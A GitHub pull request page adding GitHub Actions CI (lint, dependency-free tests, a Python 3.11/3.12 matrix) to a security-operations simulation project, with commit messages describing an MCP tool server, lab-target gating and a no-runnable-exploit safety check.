Skip to content

ci: GitHub Actions for lint, tests, and demo-mock smoke#3

Open
markl-a wants to merge 7 commits into
mainfrom
ci/github-actions
Open

ci: GitHub Actions for lint, tests, and demo-mock smoke#3
markl-a wants to merge 7 commits into
mainfrom
ci/github-actions

Conversation

@markl-a
Copy link
Copy Markdown
Owner

@markl-a markl-a commented May 5, 2026

Summary

  • .github/workflows/ci.yml runs three jobs on push to main and on every PR:
    • lint — stdlib-only run of scripts/lint.py, no install step.
    • test-no-deps — installs only pytest + pytest-asyncio. Verifies the README claim that make demo-mock works on a stock Python install. tests/test_mcp_protocol.py skips itself via pytest.importorskip("mcp").
    • test-full — matrix on Python 3.11 and 3.12. Installs requirements-dev.txt, runs lint + tests + make demo-mock + --use-llm --llm none to smoke-test the LLM provider plumbing without an API key.
  • Concurrency control cancels in-progress runs when a new commit lands on the same ref.
  • Pip cache keyed on requirements-dev.txt.
  • Adds a CI badge to README so the repo landing page and PRs show build state at a glance.

Why now

The previous PR (#2) grew the test suite from 7 to 32 tests but had no CI. That gap meant any future PR could silently regress one of the safety invariants (no-runnable-POC, lab-target gate, malicious-provider rejection). This PR closes that gap.

Self-validating

This PR validates itself: the workflow runs on this PR's branch. If the badge stays green and all three jobs pass, the workflow design is correct.

Test plan

  • All 5 CI jobs pass on this PR (lint, test-no-deps, test-full × 2 Python versions)
  • Badge in README renders correctly after merge
  • No false positives — every job has clear pass/fail semantics

🤖 Generated with Claude Code

markl-a and others added 6 commits May 5, 2026 20:53
Freeze the 11-tool MCP interface in docs/MCP-INTERFACE.md and back it with a
FastMCP server. Extract pipeline functions from scenarios/run_kill_chain.py
into phantom_secops/core.py so the Python orchestrator and MCP server share
one implementation.

- phantom_secops/mcp/safety.py centralises the lab-target whitelist and the
  no-runnable-POC prose validator. Tool wrappers and the MCP boundary both
  defer to it (defense-in-depth).
- phantom_secops/llm/ adds a Provider protocol with three implementations
  (none, anthropic, phantom_mesh). LLM-augmented prose is validated against
  safety.is_safe_prose before being merged into output; failures fall back
  to deterministic templates so the pipeline never blocks on a flaky LLM.
- Test suite grows 7 -> 32: MCP protocol smoke tests, safety unit tests,
  no-runnable-POC invariant, malicious-provider invariant under the LLM
  path, lifecycle confirmation invariant.
- Makefile gains mcp-serve / mcp-dev. requirements-dev.txt adds mcp[cli].
  scripts/lint.py covers the new phantom_secops/ package tree.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Wire the MCP server up to multiple agent runtimes so the same SecOps tools
drive workflows from any MCP client.

- .mcp.json + .claude/agents/secops-runner.md let Claude Code drive a full
  kill-chain via the MCP tools. The subagent enforces lab-target gating,
  prose-only exploit text, and lifecycle confirmation through the MCP
  layer's safety guarantees rather than prompt rules alone.
- agents/{red,blue}/*.toml updated to reference MCP tool IDs through a new
  [mcp] block (servers list + per-tool server field). Removed references to
  fictional tools (http_probe, dns_enum, cve_lookup, nikto_runner, stats)
  that no MCP tool backs. Format is provisional pending phantom-tools /
  phantom-runtime release (May-June 2026).
- docs/INTEGRATIONS.md catalogues every supported runtime (Python ref,
  Claude Code, phantom-mesh, Cursor, Continue, OpenAI Agents, LangGraph)
  with minimal config snippets and current status.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
- README quick start now offers three paths (mock / Claude Code via MCP /
  phantom-mesh) and documents the LLM provider env-var selection. Status
  table updated with MCP server, Claude Code adapter, LLM abstraction.
- ARCHITECTURE diagram redrawn with the MCP server as the single tool layer
  driven by interchangeable orchestrators; new "Why MCP first" section
  explains the tradeoff against direct phantom-mesh coupling.
- INTERVIEW-TALK-TRACK pivots the elevator pitch from "powered by phantom-
  mesh" to "runtime-agnostic SecOps platform" and adds Q&As on safety
  layering, lab-gate enforcement, and the MCP-vs-direct-runtime decision.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Apply the intent of origin/fix/utf8-encoding-windows (043cb94) to the
post-MCP-refactor file layout. The original fix patched scenarios/run_kill_chain.py
file IO that has since moved to phantom_secops/core.py and partially survives
in scenarios/run_kill_chain.py as the orchestrator's artifact writers.

All read_text / write_text calls outside of test fixtures now pass
encoding="utf-8" explicitly so mock-mode and live-mode runs produce
identical bytes on Windows (cp1252 / mbcs default) and POSIX (utf-8 default).

This supersedes origin/fix/utf8-encoding-windows; that branch's PR can be
closed once this lands on main.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Make phantom-secops runtime-agnostic via MCP server
Three jobs run on push to main and on every PR:

- `lint`: stdlib-only run of scripts/lint.py (no install step).
- `test-no-deps`: installs only pytest + pytest-asyncio, runs `make test`
  and `make demo-mock`. Verifies the README claim that the mock path
  works on a stock Python install — tests/test_mcp_protocol.py skips
  itself via pytest.importorskip("mcp").
- `test-full`: matrix on Python 3.11 and 3.12. Installs requirements-dev.txt,
  runs lint + tests + demo-mock, then `--use-llm --llm none` to smoke-test
  the LLM provider plumbing without an API key.

Concurrency control cancels in-progress runs when a new commit lands on
the same ref. Pip cache keyed on requirements-dev.txt.

Adds a CI badge to README so PR review and the repo landing page show
build state at a glance.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Two readme-adjacent docs in service of the 2026-05-20 ecosystem
launch:

* **STATUS.md** — explicit "🟡 Public Alpha" banner with a what-works
  table (mock + live demo, MCP server, agent suite, MTTD rendering),
  a what's-planned table pointing at the new L2 plan + post-launch
  ideas, and three hard safety rules that don't move (has_runnable_poc
  always false, lab targets deny-listed off-localhost, no
  customer-data ingest). Recruiters / contributors clicking from
  the phantom-mesh ecosystem table land here, see the alpha label,
  and know not to expect production polish without being mystified
  about what does work.

* **docs/L2-INTEGRATION-PLAN.md** — the design doc for runtime
  integration with phantom-mesh (red/blue agents become
  [agent.red_team] / [agent.blue_team] in agents.toml, custom tools
  exposed via secops_mcp/server.py, demo-mock orchestrator drives
  via `phantom run` subprocess + JSON state file). Tracks 5h of
  evening work scheduled for 5/14 + 5/15. Uses a turn-state file
  for cross-process exchange — chosen because phantom repl stdout
  has ANSI + cost-line decorations that are fragile to parse.

L1 branding was already in place (existing README badge, "Powered by
phantom-mesh" tagline, [phantom-mesh] cross-link in MCP-server
documentation). The L2 plan is the next step.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant